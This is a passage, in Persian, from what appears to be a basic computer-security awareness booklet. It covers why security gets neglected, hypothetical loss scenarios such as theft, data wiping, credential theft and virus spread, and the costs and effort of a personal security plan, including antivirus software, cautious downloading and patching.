ﻣﺤﺪﻭﺩﻳﺖ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪ -ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺗﺼﻮﺭ ﻣﻲ ﻛﻨﻨﺪ
ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺟﻬﺖ ﻃﺮﺍﺣﻲ ،ﻛﺪ ﻧﻮﻳﺴﻲ ﻭ ﺁﺯﻣﺎﻳﺶ ﺩﺭ
ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﺗﻮﻟﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷـﺘﻪ ﻭ
ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ.
•
ﺑــﻲﻧﻈﻤــﻲ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ -ﺩﺭ ﻛﺎﺭﻫــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ
ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﻲ ﺍﺷــﺘﺒﺎﻫﺎﺕ ﻣــﺸﺎﺑﻪ ﭼﻨــﺪﻳﻦ ﺑــﺎﺭ ﺗﻜــﺮﺍﺭ
ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻣﻲﮔﺮﺩﻧﺪ.
•
ﺧﻼﻗﻴﺖ ﺗﺒﻬﻜﺎﺭﺍﻥ -ﺍﻧﺴﺎﻥ ﻣﻮﺟﻮﺩ ﺧﻼﻗﻲ ﺍﺳﺖ ﻭ ﺍﻓﺮﺍﺩ
ﺑﺎﺍﻧﮕﻴﺰﻩ ﻫﻤﻴﺸﻪ ﺑﺮﺍﻱ ﻏﻠﺒﻪ ﺑﺮ ﻣﻮﺍﻧـﻊ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻛـﺸﻒ
ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺷﻮﻧﺪ ﺭﺍﻫﻲ ﭘﻴـﺪﺍ
ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ.
•
ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺑﺮﺍﻥ -ﻛﺎﺭﺑﺮﺍﻥ ﻣﻌﻤﻮﻟﻲ )ﻗﺮﺑﺎﻧﻴﺎﻥ
ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ( ﺑﻄﻮﺭ ﻃﺒﻴﻌﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻃـﺮﺍﻑ ﺧـﻮﺩ
ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭘﻲ ﺭﺍﻫﻬﺎﻱ ﻣﻨﺎﺳـﺐ
ﺟﻬﺖ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﻧﻴﺴﺘﻨﺪ.
•
ﻧﮕﺎﻩ ﻏﻴﺮﻭﺍﻗﻌﻲ ﻗﺮﺑﺎﻧﻴﺎﻥ -ﺑﺮﺧـﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ
ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺟﺪﻱ ﻧﻤﻲﮔﻴﺮﻧﺪ؛
ﭼﻮﻥ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺣﻤﻠـﻪﺍﻱ ﻋﻠﻴـﻪ ﺁﻧﻬـﺎ ﺻـﻮﺭﺕ
ﻧﺨﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﺍﺭﺯﻳﺎﺑﻲ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻧﻬﺎ
ﺟﻬﺖ ﺩﺭﻙ ﺍﻫﻤﻴﺖ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺍﺳـﺖ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ
ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ .ﺍﺑﺘﺪﺍ ﻓﺮﺽ ﻛﻨﻴـﺪ ﻣـﺴﺎﺋﻞ ﺯﻳـﺮ ﺍﺗﻔـﺎﻕ ﺍﻓﺘـﺎﺩﻩ
ﺑﺎﺷﻨﺪ ﻭ ﺳﭙﺲ ﺳﻌﻲ ﻛﻨﻴﺪ ﻧﺘـﺎﻳﺞ ﺍﺣﺘﻤـﺎﻟﻲ ﻫﺮﻳـﻚ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ
ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ ﻛﻠﻴـﺪﻱ ﻛـﻪ ﺩﺭ ﺍﺑﺘـﺪﺍﻱ
ﺻﻔﺤﻪ ﺑﻌﺪﻱ ﺁﻣﺪﻩ ﭘﺎﺳﺦ ﺩﻫﻴﺪ.
ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ ﺍﮔﺮ...
...ﺷﺨﺼﻲ ﺑﻪ ﺧﺎﻧﻪ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ
ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻳﺴﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﻛﻪ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻧﺰﺩﻳﻜﻲ ﺑﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﺑﺎ ﺧﻮﺩ ﺑﺒﺮﺩ.
...ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﭘﺎﻙ ﺷﻮﻧﺪ.
...ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ .ﺍﻳﻦ ﺩﺍﺩﻩﻫـﺎ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺑﺎﺷﻨﺪ ﺍﺯ ﻗﺒﻴﻞ :ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ
ﺑﺎﻧﻜﻲ ،ﻓﻬﺮﺳﺖ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮ ﹺﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ
ﻭﺏ ﺍﻧﺠﺎﻡ ﺧﺮﻳﺪﻫﺎﻱ ﺑﺮﺧﻂ ،٤ﮔﺰﺍﺭﺷﻬﺎﻱ ﻛﺎﺭﻱ ﻣﻬﻢ ﻭ ﺗﻜﺎﻟﻴﻒ
ﺩﺭﺳﻲ ﻛﻪ ﺍﺭﺯﺵ ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ %۵۰ﻧﻤﺮﺍﺕ ﺩﺭﺳﻬﺎﻱ ﺗﺮﻡ ﺟـﺎﺭﻱ
ﺷﻤﺎ ﺍﺳﺖ.
...ﺷﺨﺼﻲ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﻫﺮ ﺁﻧﭽﻪ ﺭﺍ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺍﻧﺠـﺎﻡ
ﻣﻲﺩﻫﻴﺪ ﻣﺸﺎﻫﺪﻩ ﻛﻨﺪ ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ
ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺁﻥ ﺁﮔﺎﻩ ﺷﻮﺩ ،ﺍﺯ ﮔﺸﺖ ﻭ ﮔـﺬﺍﺭ
ﺷﻤﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺨﺘﻠـﻒ ﻣﻄﻠـﻊ ﺑﺎﺷـﺪ ،ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﺑـﺎ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻣـﻲﻛﻨﻴـﺪ ﺑﺘﻮﺍﻧـﺪ ﻧـﺎﻡ
ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ.
...ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻭﻱ ﻳﻚ ﭘﺮﻭﮊﺓ ﻣﻬﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﺯﻣـﺎﻥ ﺩﺭ ﺁﻥ
ﻧﻘﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺩﺍﺭﺩ ،ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﮔﺮﺩﺩ.
...ﻳﻚ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺨﺮﺏ ﺑﻪ ﻫﻤﻪ ﺩﻭﺳﺘﺎﻧﺘﺎﻥ ﻛﻪ ﻧﺎﻡ ﺁﻧﻬﺎ
ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺛﺒﺖ ﺷﺪﻩ ﺍﺭﺳﺎﻝ ﺷﻮﺩ.
...ﻭﻗﺘﻲ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻳﺪ ﻣﻼﺣﻈﻪ ﻛﻨﻴﺪ ﻛـﻪ
ﻣﺒﻠﻎ ﺁﻥ ﺣﺘﻲ ﺍﺯ ﺣﻘﻮﻕ ﻣﺎﻫﻴﺎﻧﺔ ﺷﻤﺎ ﻫﻢ ﺑﻴﺸﺘﺮ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﺩﺭ
ﺷﺮﺍﻳﻄﻲ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤـﺌﻦ ﻫـﺴﺘﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻴـﺰﺍﻥ ﺍﺯ ﺗﻠﻔـﻦ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﺮﺩﻩﺍﻳﺪ.
...ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﺭﺳـﺎﻝ ﺷـﻮﺩ ﻭ
ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻛﻪ ﺍﻳﻦ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺷـﻤﺎ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﺑﺎﻧـﻚ
ﺳﻌﻲ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﻣﺘﻘﺎﻋﺪ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺯ ﻛـﺎﺭﺕ ﺧـﻮﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩﻩﺍﻳﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺪﻋﺎ ﺩﻟﻴﻞ ﻫﻢ ﺩﺍﺭﺩ.
ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ ﺑﻪ
ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
•
•
•
•
•
ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ،ﺁﻳﺎ ﺍﻣﻜﺎﻥ ﺗﺮﻣﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﭼﻘﺪﺭ ﺯﻣﺎﻥ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟
ﭼﻪ ﻣﻘﺪﺍﺭ ﻫﺰﻳﻨﻪ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﻮﺩ؟
ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﺪ؟
ﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﻧﺎﻣﻨﺎﺳﺐ
ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺩﺭ ﺑﺮ ﺩﺍﺭﺩ؟ )ﻣﺜ ﹰ
ﻭ ﺩﺭ ﻏﻴﺎﺏ ﻣﺴﺌﻮﻝ ﻣﺮﺑﻮﻃﻪ(
ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻫﻤﻴﺖ ﻣﻮﺿﻮﻉ "ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ" ﺭﺍ ﻣـﺸﺨﺺ
ﻣﻲﻛﻨﻨﺪ .ﺍﻛﻨﻮﻥ ﻛﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻩﺍﻳﺪ ﺍﻣﻨﻴﺖ ﻣﻮﺿﻮﻋﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ
ﺍﺳﺖ ،ﮔﺎﻡ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﻃﺮﺡ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ
ﺷﺪﻥ ﻣﻲﺑﺎﺷﺪ:
Online Shopping
4
٥١
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
•
•
•
•
•
ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟
ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟
ﺗﺎ ﭼﻪ ﺣﺪ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟
ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ،
ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟
ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬـﺎﻳﻲ ﻃـﺮﺡ ﺭﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺮﺍﻱ
ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟
ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟
ﭼﻨﺪ ﺭﺍﻫﻜﺎﺭ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘـﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﻪ ﺗﺠﻬﻴـﺰﺍﺕ
ﭼﻨﺪﺍﻧﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ ﻭ ﺗﺠﻬﻴـﺰﺍﺕ ﻻﺯﻡ ﻧﻴـﺰ ﺁﻧﭽﻨـﺎﻥ ﮔﺮﺍﻧﻘﻴﻤـﺖ
ﻧﻴﺴﺘﻨﺪ .ﺣﺘﻲ ﻭﻳـﺮﻭﺱ ﻳﺎﺑﻬـﺎ ٥ﻛـﻪ ﺭﺍﻳﺠﺘـﺮﻳﻦ ﻛـﺎﻻﻱ ﺍﻣﻨﻴﺘـﻲ
ﻫﺴﺘﻨﺪ ﺩﺭ ﻗﺎﻟﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ٦ﺩﺭ ﺩﺳـﺘﺮﺱ ﻣـﻲﺑﺎﺷـﺪ.
ﺷــﺎﻳﺎﻥ ﺫﻛــﺮ ﺍﺳــﺖ ﻛــﻪ ﻓﻬﺮﺳــﺖ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺭﺍﺋــﻪﻛﻨﻨــﺪﺓ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﺋﻢ ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﺪ.
ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟
ﻣﺴﻠﻤﹰﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻭ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺁﻥ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧـﻮﺩ
ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ ،ﺍﻣﺎ ﻣﻴﺰﺍﻥ ﺍﻳﻦ ﺯﻣـﺎﻥ ﺯﻳـﺎﺩ ﻧﻴـﺴﺖ .ﺩﺭ ﺍﻳـﻦ
ﺧﺼﻮﺹ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴـﺪ ﻭ
ﺳﭙﺲ ﻭﻇﺎﻳﻒ ﺣﻔﺎﻇﺘﻲ ﻣﻌﻤﻮﻝ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﺑﻪ
ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻴﺪ.
ﺗﺎ ﭼﻪ ﺣﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟
ﻣﻴﺰﺍﻥ ﻣﺸﻜﻼﺕ ﺑﻪ ﺩﻳﺪﮔﺎﻩ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﺁﻧﭽﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻫﺮﮔـﺰ ﻧﺒﺎﻳـﺪ ﻓﻜـﺮ
ﻛﻨﻴﺪ ﻛﻪ ﻫﺮ ﭼﻴﺰﻱ ﺩﺭ ﻧﻮﻉ ﺧﻮﺩ ﻭﺍﺟﺪ ﺍﻣﻨﻴﺖ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺜـﺎﻝ
ﺍﮔﺮ ﺷﺨﺼﻲ ﺩﺭ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺿـﻤﻴﻤﻪﺍﻱ
Virus Scanners
Freeware
5
6
ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘـﻲ،
ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟
ﺑﻠﻪ؛ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺎﻳﺪ ﻋﻤﻠﻜـﺮﺩ ﺧـﻮﺩ ﺭﺍ ﺗـﺎ ﺣـﺪﻭﺩﻱ
ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ .ﺍﻧﺘﺨﺎﺏ ﻃﺮﺣﻲ ﺑـﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺑﻴـﺸﺘﺮ ،ﺷـﻤﺎ ﺭﺍ ﺑـﻪ
ﺁﮔﺎﻫﻲ ﺑﻴﺸﺘﺮ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ -ﻛﻪ ﺑﺎﻳﺪ ﺗﺎ ﺣﺪ ﺍﻣﻜـﺎﻥ
ﺍﺯ ﺑﺮﻭﺯ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ -ﻣﻲﺭﺳﺎﻧﺪ .ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ
ﺟﺪﻳﺪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺬﺍﺏ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧـﺪ ،ﺍﻣـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ -
ﺧﺼﻮﺻﹰﺎ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﺑﺮﺍﻱ ﮔﺴﺘﺮﺵ ﺷﺒﻜﻪ ﻭ ﺍﺭﺳـﺎﻝ ﻭ ﺩﺭﻳﺎﻓـﺖ
ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ -ﺑﺎﻋﺚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ
ﻣﻲ ﮔﺮﺩﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﺪ ﻛﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻣﻮﺭﺩ ﻧﻈﺮ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭﻟـﻲ ﺑـﺮﺍﻱ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﻻﺯﻡ ﺑﺎﺷـﺪ ﻛـﻪ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺧـﺎﺹ ﺁﻧـﺮﺍ
downloadﻭ ﺑﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺍﺟﺮﺍ ﻛﻨﻴﺪ .ﺍﮔـﺮ ﻧـﺴﺒﺖ ﺑـﻪ
ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻳﺪ
ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺑـﻪ
ﺍﺭﻣﻐﺎﻥ ﺑﻴﺎﻭﺭﺩ ﺻﺮﻓﻨﻈﺮ ﻧﻤﺎﻳﻴﺪ.
ﺁﻳﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻃﺮﺡ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻳﺎ ﺑـﺮﺍﻱ
ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟
ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﻣﺴﺌﻮﻝ ﺗﻤﺎﻡ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺘﻲ ﺳﻴـﺴﺘﻢ
ﺧﻮﺩ ﻫﺴﺘﻴﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺘﺮ ﺍﻧﺠـﺎﻡ
ﺷﺪﻥ ﻛﺎﺭ ﺍﺯ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ.
•
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻭﺻـﻠﻪﻫـﺎﻱ ٧ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻛـﻪ
ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴـﺖ ﺍﺳـﺖ ﺑـﻪ ﭘﻬﻨـﺎﻱ
ﺑﺎﻧﺪ ٨ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑـﺮﺍﻱ ﻛـﺴﻲ
ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﺪﻩ ﻭ ﺳﺮﻋﺖ ﺍﺭﺗﺒﺎﻁ ﻭﻱ ﺩﺭ ﺣﺪ
ﻣﮕﺎﺑﺎﻳﺖ ﺍﺳﺖ ﻣﺸﻜﻠﺴﺎﺯ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﺩﺭ
